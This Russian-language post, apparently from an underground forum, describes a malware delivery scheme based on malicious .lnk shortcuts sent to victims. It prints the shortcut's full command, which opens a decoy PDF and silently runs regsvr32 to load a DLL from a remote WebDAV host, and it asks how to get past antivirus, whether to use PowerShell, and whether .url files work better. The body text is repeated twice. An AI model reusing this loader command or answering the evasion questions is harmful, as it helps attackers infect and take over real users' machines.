Реализовал неплоху схему для выдачи юзеру .lnk файла. Траф есть.
В схеме хорошое логирование и все этапы отрабатывают на ура.
И все в этой схеме хорошо, кроме последнего шага - запуска lnk... его не запускают.
Или возможно запускают, но сразу на него агрится АВ. Тестил на дефе все гуд.
Lnk файл выгледет так:
%windir%\System32\cmd.exe /c "start "" /B "\\1.1.1.1\webdav\sample.pdf"&start "" /B /d "%windir%\System32\" regsvr32.exe /s \\1.1.1.1\webdav\sample.dll"
Скажите, как по вашему - это нормальный вариант? Или стоит замарачиваться с powershell так как этот вариант агрит все АВ? Или вероятнее всего не запусков, потому что есть алерт. что файл запускается запускается не с компа юзера ?
Еще такой вопрос - читал про формат .url - он чем то лучше или "Те же яйца, только в профиль" ?
Буду благодарен за любую помощь. А то уже устал - трафик есть, а запусков нет =)
В схеме хорошое логирование и все этапы отрабатывают на ура.
И все в этой схеме хорошо, кроме последнего шага - запуска lnk... его не запускают.
Или возможно запускают, но сразу на него агрится АВ. Тестил на дефе все гуд.
Lnk файл выгледет так:
%windir%\System32\cmd.exe /c "start "" /B "\\1.1.1.1\webdav\sample.pdf"&start "" /B /d "%windir%\System32\" regsvr32.exe /s \\1.1.1.1\webdav\sample.dll"
Скажите, как по вашему - это нормальный вариант? Или стоит замарачиваться с powershell так как этот вариант агрит все АВ? Или вероятнее всего не запусков, потому что есть алерт. что файл запускается запускается не с компа юзера ?
Еще такой вопрос - читал про формат .url - он чем то лучше или "Те же яйца, только в профиль" ?
Буду благодарен за любую помощь. А то уже устал - трафик есть, а запусков нет =)